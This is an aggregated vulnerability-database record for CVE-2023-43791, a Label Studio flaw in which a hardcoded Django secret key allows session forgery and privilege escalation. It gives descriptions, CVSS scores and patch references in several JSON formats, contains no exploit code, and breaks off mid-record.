CVE-2023-43791 (GCVE-0-2023-43791)

Vulnerability from cvelistv5 – Published: 2023-11-09 14:42 – Updated: 2024-09-03 18:46

Summary

Label Studio is a multi-type data labeling and annotation tool with standardized output format. There is a vulnerability that can be chained within the ORM Leak vulnerability to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user. The vulnerability was found to affect versions before `1.8.2`, where a patch was introduced.

Severity ?

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor

Assigner

GitHub_M

References

URL

Tags

	https://github.com/HumanSignal/label-studio/secur…	x_refsource_CONFIRM
	https://github.com/HumanSignal/label-studio/pull/4690	x_refsource_MISC
	https://github.com/HumanSignal/label-studio/commi…	x_refsource_MISC
	https://github.com/HumanSignal/label-studio/relea…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	HumanSignal	label-studio	Affected: <= 1.8.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T19:52:11.411Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m"
          },
          {
            "name": "https://github.com/HumanSignal/label-studio/pull/4690",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/HumanSignal/label-studio/pull/4690"
          },
          {
            "name": "https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b"
          },
          {
            "name": "https://github.com/HumanSignal/label-studio/releases/tag/1.8.2",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/HumanSignal/label-studio/releases/tag/1.8.2"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-43791",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-03T18:43:34.308098Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-03T18:46:40.834Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "label-studio",
          "vendor": "HumanSignal",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 1.8.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Label Studio is a multi-type data labeling and annotation tool with standardized output format. There is a vulnerability that can be chained within the ORM Leak vulnerability to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user. The vulnerability was found to affect versions before `1.8.2`, where a patch was introduced."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-11-09T14:42:40.750Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m"
        },
        {
          "name": "https://github.com/HumanSignal/label-studio/pull/4690",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/HumanSignal/label-studio/pull/4690"
        },
        {
          "name": "https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b"
        },
        {
          "name": "https://github.com/HumanSignal/label-studio/releases/tag/1.8.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/HumanSignal/label-studio/releases/tag/1.8.2"
        }
      ],
      "source": {
        "advisory": "GHSA-f475-x83m-rx5m",
        "discovery": "UNKNOWN"
      },
      "title": "Label Studio has Hardcoded Django `SECRET_KEY` that can be Abused to Forge Session Tokens"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-43791",
    "datePublished": "2023-11-09T14:42:40.750Z",
    "dateReserved": "2023-09-22T14:51:42.339Z",
    "dateUpdated": "2024-09-03T18:46:40.834Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"1.8.2\", \"matchCriteriaId\": \"ACEFE38F-DAA5-4450-9527-0669A8790ADC\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Label Studio is a multi-type data labeling and annotation tool with standardized output format. There is a vulnerability that can be chained within the ORM Leak vulnerability to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user. The vulnerability was found to affect versions before `1.8.2`, where a patch was introduced.\"}, {\"lang\": \"es\", \"value\": \"Label Studio es una herramienta de anotaci\\u00f3n y etiquetado de datos de varios tipos con formato de salida estandarizado. Existe una vulnerabilidad que se puede encadenar dentro de la vulnerabilidad ORM Leak para hacerse pasar por cualquier cuenta en Label Studio. Un atacante podr\\u00eda aprovechar estas vulnerabilidades para escalar sus privilegios de un usuario con permisos bajos a un usuario s\\u00faper administrador de Django. Se descubri\\u00f3 que la vulnerabilidad afectaba a versiones anteriores a la \\\"1.8.2\\\", donde se introdujo un parche.\"}]",
      "id": "CVE-2023-43791",
      "lastModified": "2024-11-21T08:24:47.447",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 8.8, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 5.9}]}",
      "published": "2023-11-09T15:15:08.743",
      "references": "[{\"url\": \"https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/pull/4690\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/releases/tag/1.8.2\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/pull/4690\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/releases/tag/1.8.2\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-200\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2023-43791\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2023-11-09T15:15:08.743\",\"lastModified\":\"2024-11-21T08:24:47.447\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Label Studio is a multi-type data labeling and annotation tool with standardized output format. There is a vulnerability that can be chained within the ORM Leak vulnerability to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user. The vulnerability was found to affect versions before `1.8.2`, where a patch was introduced.\"},{\"lang\":\"es\",\"value\":\"Label Studio es una herramienta de anotaci\u00f3n y etiquetado de datos de varios tipos con formato de salida estandarizado. Existe una vulnerabilidad que se puede encadenar dentro de la vulnerabilidad ORM Leak para hacerse pasar por cualquier cuenta en Label Studio. Un atacante podr\u00eda aprovechar estas vulnerabilidades para escalar sus privilegios de un usuario con permisos bajos a un usuario s\u00faper administrador de Django. Se descubri\u00f3 que la vulnerabilidad afectaba a versiones anteriores a la \\\"1.8.2\\\", donde se introdujo un parche.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.8.2\",\"matchCriteriaId\":\"ACEFE38F-DAA5-4450-9527-0669A8790ADC\"}]}]}],\"references\":[{\"url\":\"https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/HumanSignal/label-studio/pull/4690\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/HumanSignal/label-studio/releases/tag/1.8.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/HumanSignal/label-studio/pull/4690\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/HumanSignal/label-studio/releases/tag/1.8.2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m\", \"name\": \"https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/pull/4690\", \"name\": \"https://github.com/HumanSignal/label-studio/pull/4690\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b\", \"name\": \"https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/releases/tag/1.8.2\", \"name\": \"https://github.com/HumanSignal/label-studio/releases/tag/1.8.2\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T19:52:11.411Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-43791\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-09-03T18:43:34.308098Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-09-03T18:44:37.496Z\"}}], \"cna\": {\"title\": \"Label Studio has Hardcoded Django `SECRET_KEY` that can be Abused to Forge Session Tokens\", \"source\": {\"advisory\": \"GHSA-f475-x83m-rx5m\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"HumanSignal\", \"product\": \"label-studio\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 1.8.1\"}]}], \"references\": [{\"url\": \"https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m\", \"name\": \"https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/pull/4690\", \"name\": \"https://github.com/HumanSignal/label-studio/pull/4690\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b\", \"name\": \"https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/HumanSignal/label-studio/releases/tag/1.8.2\", \"name\": \"https://github.com/HumanSignal/label-studio/releases/tag/1.8.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Label Studio is a multi-type data labeling and annotation tool with standardized output format. There is a vulnerability that can be chained within the ORM Leak vulnerability to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user. The vulnerability was found to affect versions before `1.8.2`, where a patch was introduced.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-200\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2023-11-09T14:42:40.750Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2023-43791\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-09-03T18:46:40.834Z\", \"dateReserved\": \"2023-09-22T14:51:42.339Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2023-11-09T14:42:40.750Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

FKIE_CVE-2023-43791

Vulnerability from fkie_nvd - Published: 2023-11-09 15:15 - Updated: 2024-11-21 08:24

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b	Patch
security-advisories@github.com	https://github.com/HumanSignal/label-studio/pull/4690	Patch
security-advisories@github.com	https://github.com/HumanSignal/label-studio/releases/tag/1.8.2	Release Notes
security-advisories@github.com	https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/HumanSignal/label-studio/pull/4690	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/HumanSignal/label-studio/releases/tag/1.8.2	Release Notes
af854a3a-2127-422b-91ae-364da2661108	https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	humansignal	label_studio	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "ACEFE38F-DAA5-4450-9527-0669A8790ADC",
              "versionEndExcluding": "1.8.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Label Studio is a multi-type data labeling and annotation tool with standardized output format. There is a vulnerability that can be chained within the ORM Leak vulnerability to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user. The vulnerability was found to affect versions before `1.8.2`, where a patch was introduced."
    },
    {
      "lang": "es",
      "value": "Label Studio es una herramienta de anotaci\u00f3n y etiquetado de datos de varios tipos con formato de salida estandarizado. Existe una vulnerabilidad que se puede encadenar dentro de la vulnerabilidad ORM Leak para hacerse pasar por cualquier cuenta en Label Studio. Un atacante podr\u00eda aprovechar estas vulnerabilidades para escalar sus privilegios de un usuario con permisos bajos a un usuario s\u00faper administrador de Django. Se descubri\u00f3 que la vulnerabilidad afectaba a versiones anteriores a la \"1.8.2\", donde se introdujo un parche."
    }
  ],
  "id": "CVE-2023-43791",
  "lastModified": "2024-11-21T08:24:47.447",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-11-09T15:15:08.743",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/HumanSignal/label-studio/pull/4690"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/HumanSignal/label-studio/releases/tag/1.8.2"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/HumanSignal/label-studio/pull/4690"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/HumanSignal/label-studio/releases/tag/1.8.2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GSD-2023-43791

Vulnerability from gsd - Updated: 2023-12-13 01:20

Details

Aliases

CVE-2023-43791

Aliases

CVE-2023-43791

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2023-43791",
    "id": "GSD-2023-43791"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2023-43791"
      ],
      "details": "Label Studio is a multi-type data labeling and annotation tool with standardized output format. There is a vulnerability that can be chained within the ORM Leak vulnerability to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user. The vulnerability was found to affect versions before `1.8.2`, where a patch was introduced.",
      "id": "GSD-2023-43791",
      "modified": "2023-12-13T01:20:44.372802Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2023-43791",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "label-studio",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "\u003c= 1.8.1"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "HumanSignal"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Label Studio is a multi-type data labeling and annotation tool with standardized output format. There is a vulnerability that can be chained within the ORM Leak vulnerability to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user. The vulnerability was found to affect versions before `1.8.2`, where a patch was introduced."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-200",
                "lang": "eng",
                "value": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m",
            "refsource": "MISC",
            "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m"
          },
          {
            "name": "https://github.com/HumanSignal/label-studio/pull/4690",
            "refsource": "MISC",
            "url": "https://github.com/HumanSignal/label-studio/pull/4690"
          },
          {
            "name": "https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b",
            "refsource": "MISC",
            "url": "https://github.com/HumanSignal/label-studio/commit/3d06c5131c15600621e08b06f07d976887cde81b"
          },
          {
            "name": "https://github.com/HumanSignal/label-studio/releases/tag/1.8.2",
            "refsource": "MISC",
            "url": "https://github.com/HumanSignal/label-studio/releases/tag/1.8.2"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-f475-x83m-rx5m",
        "discovery": "UNKNOWN"
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.8.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2023-43791"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Label Studio is a multi-type data labeling and annotation tool with standardized output format. There is a vulnerability that can be chained within the ORM Leak vulnerability to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user. The vulnerability was found to affect versions before `1.8.2`, where a patch was introduced."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": []
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-f475-x83m-rx5m",
              "refsource": "",
              "tags": [
                "Exploit",
